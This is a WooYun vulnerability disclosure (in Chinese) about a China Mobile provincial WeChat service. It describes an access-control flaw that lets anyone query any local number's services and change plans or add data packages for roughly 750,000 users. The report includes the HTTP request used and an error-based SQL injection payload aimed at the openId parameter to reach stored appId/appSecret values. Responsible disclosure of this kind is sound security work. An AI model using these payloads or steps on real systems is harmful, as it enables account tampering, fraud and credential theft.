当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0207574

漏洞标题:某省移动设计缺陷可随意对75w用户进行套餐变更和上网流量包开通业务

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2016-05-11 20:10

修复时间:2016-06-27 17:00

公开时间:2016-06-27 17:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-11: 细节已通知厂商并且等待厂商处理中
2016-05-13: 厂商已经确认,细节仅向厂商公开
2016-05-23: 细节向核心白帽子及相关领域专家公开
2016-06-02: 细节向普通白帽子公开
2016-06-12: 细节向实习白帽子公开
2016-06-27: 细节向公众公开

简要描述:

1.查询省内任意移动号码已开通业务
2.操作75w用户套餐变更和上网流量包开通

详细说明:

事关两个微信公众号

IMG_0428.PNG


IMG_0429.PNG


打开河南移动10086公众号()
进入更多服务

IMG_0430.PNG


点进去可以看到

IMG_0431.PNG


其主要的URL部分如下:

mask 区域
1.http://**.**.**/weixin/khfwController.dogoIndex&openId=oMAmUjlbJIiy4fJ7xtZ2k9NgLL-I


Snap55.png


打开第一个
不知道是我没有绑定的原因还是别的
这里面写的是别人的手机号码

Snap57.png


河南省内移动号都可以查
看我的

IMG_0432.PNG


Snap58.png


IMG_0433.PNG


Snap59.png


下面两个业务不太确定是否能成功
反正我测试我的失败了
好像业务冲突

漏洞证明:

2.操作75w用户套餐变更和上网流量包开通
这个需要获取关注该微信号的openid
郑州10086那个公众号
打开和办理

IMG_0434.PNG


套餐变更和上网流量包均存在问题
这里以上网流量包为例

Snap60.png


http://**.**.**.**/hkwx/addValueProductController.do?goAddValueProductList&symbol=addvalue&openId=****&accountId=gh_065a64f56fc7
该openId为关注公众号的openId
随便开一个吧
例如五元那个

GET /hkwx/addValueProductController.do?goAddValueProductDetail&id=402880a94959ad4f014959ae272c0001&symbol=addvalue HTTP/1.1
Host: **.**.**.**
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: keep-alive
Proxy-Connection: keep-alive
Cookie: JSESSIONID=4453F42BBC0FB439D43D5385EB20AF9B
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 MicroMessenger/6.3.16 NetType/WIFI Language/zh_CN
Accept-Language: zh-cn
Referer: http://**.**.**.**/hkwx/addValueProductController.do?goAddValueProductList&symbol=addvalue&openId=用户的openId&accountId=gh_065a64f56fc7
Accept-Encoding: gzip, deflate


Snap61.png


IMG_0436.PNG


获取openId的方法

http://**.**.**.**/hkwx/suggestionPersonController.do?goRandomPage&openId=' AND (SELECT 1573 FROM(SELECT COUNT(*),CONCAT(0x71707a6271,(SELECT (ELT(1573=1573,1))),0x71716a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UVyK'='UVyK


sql注入
在表weixin_accountinfo中
存着微信公众号的appId和appSecret
开通业务方法
首先打开

http://**.**.**.**/hkwx/addValueProductController.do?goAddValueProductList&symbol=addvalue&openId=***&accountId=gh_065a64f56fc7


Snap67.png


然后选择一个套餐

Snap68.png


然后点立即办理
确认即可

Snap64.png


Snap66.png


大概有75w用户
变更套餐操作和这个差不多

http://**.**.**.**/hkwx/planController.do?goPlanIndexPage&openId=XXX&accountId=gh_065a64f56fc7


就不演示了
河南那个就不存在这样的问题

Snap70.png


需要绑定 并且需要验证码

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-13 16:54

厂商回复:

CNVD未复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评价